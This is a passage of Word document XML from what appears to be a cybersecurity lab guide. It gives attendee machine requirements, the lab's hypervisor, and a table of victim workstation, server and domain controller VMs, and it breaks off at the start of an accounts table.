          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attendee’s machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0510E9" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ideal resolution 1920 x 1080 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66A75E" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An Internet browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F8A20" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An RDP client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2EAAE" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internet access without restriction on outbound connections. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">The following outbound TCP port must be accessible : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3881F532" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRPr="00B36AD0" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/80 and TCP/443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reach Azure Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA84CDD" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002935CB">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP/3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish RDP remote connection to virtual machines exposed directly to Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99A1FD" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRPr="00D64D39" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E82960" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRPr="008D2065" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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6B745149"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3" w:name="_Toc44075675"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Before the </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1">
        <w:t>exercise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="40325279" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRPr="00C6425D" w:rsidRDefault="00F36A4D" w:rsidP="00A973CD">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Duration: </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A973CD" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAFD9C" w14:textId="4BF6CF16" w:rsidR="007B2CDA" w:rsidRPr="00C6425D" w:rsidRDefault="00F36A4D" w:rsidP="00761BFC">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Synopsis: In this </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, you will set up your environment for use in the rest of the </w:t>
      </w:r>
      <w:r w:rsidR="009B4B6B" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. You should </w:t>
      </w:r>
      <w:r w:rsidR="008A1AC1" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>have the following environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56736B90" w14:textId="24F254B9" w:rsidR="00BE214F" w:rsidRDefault="00BE214F" w:rsidP="00761BFC"/>
    <w:p w14:paraId="0FE9B275" w14:textId="2E7A258A" w:rsidR="00BE214F" w:rsidRDefault="00BE214F" w:rsidP="00BE214F">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc526182045"/>
      <w:bookmarkStart w:id="15" w:name="_Toc526233439"/>
      <w:bookmarkStart w:id="16" w:name="_Toc44075676"/>
      <w:r w:rsidRPr="002F69F7">
        <w:t>List of VM to start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="002F69F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9405A" w14:textId="66E17968" w:rsidR="00C67E63" w:rsidRPr="00940D1A" w:rsidRDefault="00C67E63" w:rsidP="00C67E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940D1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">All the VMs are available </w:t>
      </w:r>
      <w:r w:rsidR="00321848" w:rsidRPr="00940D1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00940D1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00B9313A" w:rsidRPr="00940D1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CSW-WIN-HV1</w:t>
      </w:r>
      <w:r w:rsidR="00BF0A88" w:rsidRPr="00940D1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtual machine that is a hypervisor.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille2-Accentuation1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4253"/>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65DB8" w14:paraId="3CF334DA" w14:textId="77777777" w:rsidTr="00940D1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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23100D3E" w14:textId="77777777" w:rsidR="00E65DB8" w:rsidRDefault="00E65DB8" w:rsidP="00D1539E">
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39D8C40A" w14:textId="77777777" w:rsidR="00E65DB8" w:rsidRDefault="00E65DB8" w:rsidP="00D1539E">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OS Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE5762B" w14:textId="77777777" w:rsidR="00E65DB8" w:rsidRDefault="00E65DB8" w:rsidP="00D1539E">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E65DB8" w14:paraId="7DD7B906" w14:textId="77777777" w:rsidTr="00940D1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tcPr>
          <w:p w14:paraId="6D3517E7" w14:textId="1DE43883" w:rsidR="00E65DB8" w:rsidRDefault="00460056" w:rsidP="00A271F0">
            <w:r w:rsidRPr="00460056">
              <w:t xml:space="preserve">WIN-HV1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB2801">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00E65DB8" w:rsidRPr="00FB2801">
              <w:t>CYBERSEC-TD5</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB2801">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E2D9BA" w14:textId="5FF83A8D" w:rsidR="00E65DB8" w:rsidRDefault="00E65DB8" w:rsidP="00A271F0">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Windows Server </w:t>
            </w:r>
            <w:r w:rsidR="00940D1A">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C78220" w14:textId="3D385FAF" w:rsidR="00E65DB8" w:rsidRDefault="00E65DB8" w:rsidP="00A271F0">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hyper-V server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07D834EA" w14:textId="77777777" w:rsidR="00A271F0" w:rsidRDefault="00A271F0" w:rsidP="00C67E63"/>
    <w:p w14:paraId="136FD9FF" w14:textId="76563F98" w:rsidR="00BE214F" w:rsidRPr="003E7A19" w:rsidRDefault="00BE214F" w:rsidP="00BE214F">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940D1A">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800"/>
        <w:gridCol w:w="3150"/>
        <w:gridCol w:w="2037"/>
        <w:gridCol w:w="1290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C67E63" w14:paraId="239F48A0" w14:textId="77777777" w:rsidTr="00C6425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00" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F1AC438" w14:textId="77777777" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:r>
              <w:t>Name of VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B0B2C7" w14:textId="77777777" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OS Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2037" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F3C1C06" w14:textId="478A8784" w:rsidR="00C67E63" w:rsidRDefault="006428FC" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hosted on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5009F198" w14:textId="67DBAC7A" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67E63" w14:paraId="57AF5895" w14:textId="77777777" w:rsidTr="00C642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00" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC41E1B" w14:textId="06A62A9D" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:r>
              <w:t>VICTIM-PC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6161DB36" w14:textId="77777777" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 10 Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2037" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7B6DE5" w14:textId="6470EC2D" w:rsidR="00C67E63" w:rsidRDefault="004A6D65" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004A6D65">
              <w:t>CYBERSEC-TD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C2D97F1" w14:textId="33850F30" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67E63" w14:paraId="79A67940" w14:textId="77777777" w:rsidTr="00C6425D">
        <w:trPr>
          <w:trHeight w:val="250"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C067668" w14:textId="51D9EF3A" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:r>
              <w:t>VICTIM-SRV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19766FA5" w14:textId="59E69C0B" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A4060B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows Server 2012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2037" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ADFD2F5" w14:textId="5B2159E1" w:rsidR="00C67E63" w:rsidRDefault="004A6D65" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004A6D65">
              <w:t>CYBERSEC-TD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07446983" w14:textId="2440903C" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67E63" w14:paraId="0F61EFB7" w14:textId="77777777" w:rsidTr="00C6425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00" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435AC7F9" w14:textId="5EFD5EEA" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:r>
              <w:t>VICTIM-DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C10DE59" w14:textId="04EEBB93" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows Server 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2037" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673BA399" w14:textId="2981FD48" w:rsidR="00C67E63" w:rsidRDefault="004A6D65" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004A6D65">
              <w:t>CYBERSEC-TD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01C887DC" w14:textId="7112FFDB" w:rsidR="00C67E63" w:rsidRDefault="00C67E63" w:rsidP="00A973CD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DEEC669" w14:textId="77777777" w:rsidR="007D0720" w:rsidRDefault="007D0720" w:rsidP="00A973CD"/>
    <w:p w14:paraId="27B9BD16" w14:textId="25098413" w:rsidR="00BB44DD" w:rsidRDefault="00BB44DD" w:rsidP="00A973CD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Accounts:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille2-Accentuation1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F3552C" w14:paraId="48849E47" w14:textId="77777777" w:rsidTr="00C6425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80" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DCBCB6" w14:textId="0E840D8E" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:r>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C07C3DE" w14:textId="239A8A1F" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60F20512" w14:textId="4213CCEA" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FB9732F" w14:textId="094D7EA0" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F3552C" w14:paraId="544755FC" w14:textId="77777777" w:rsidTr="00C6425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80" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B8D938" w14:textId="7ADE8640" w:rsidR="00F3552C" w:rsidRDefault="002D6E40" w:rsidP="0013017C">
            <w:r w:rsidRPr="002D6E40">
              <w:t xml:space="preserve">WIN-HV1 </w:t>
            </w:r>
            <w:r w:rsidR="00460056" w:rsidRPr="00FB2801">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00E65DB8" w:rsidRPr="00FB2801">
              <w:t>CYBERSEC-TD5</w:t>
            </w:r>
            <w:r w:rsidR="00460056" w:rsidRPr="00FB2801">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B06245" w14:textId="5CE0509D" w:rsidR="00F3552C" w:rsidRDefault="00F3552C" w:rsidP="0013017C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cyberadm</w:t>
            </w:r>
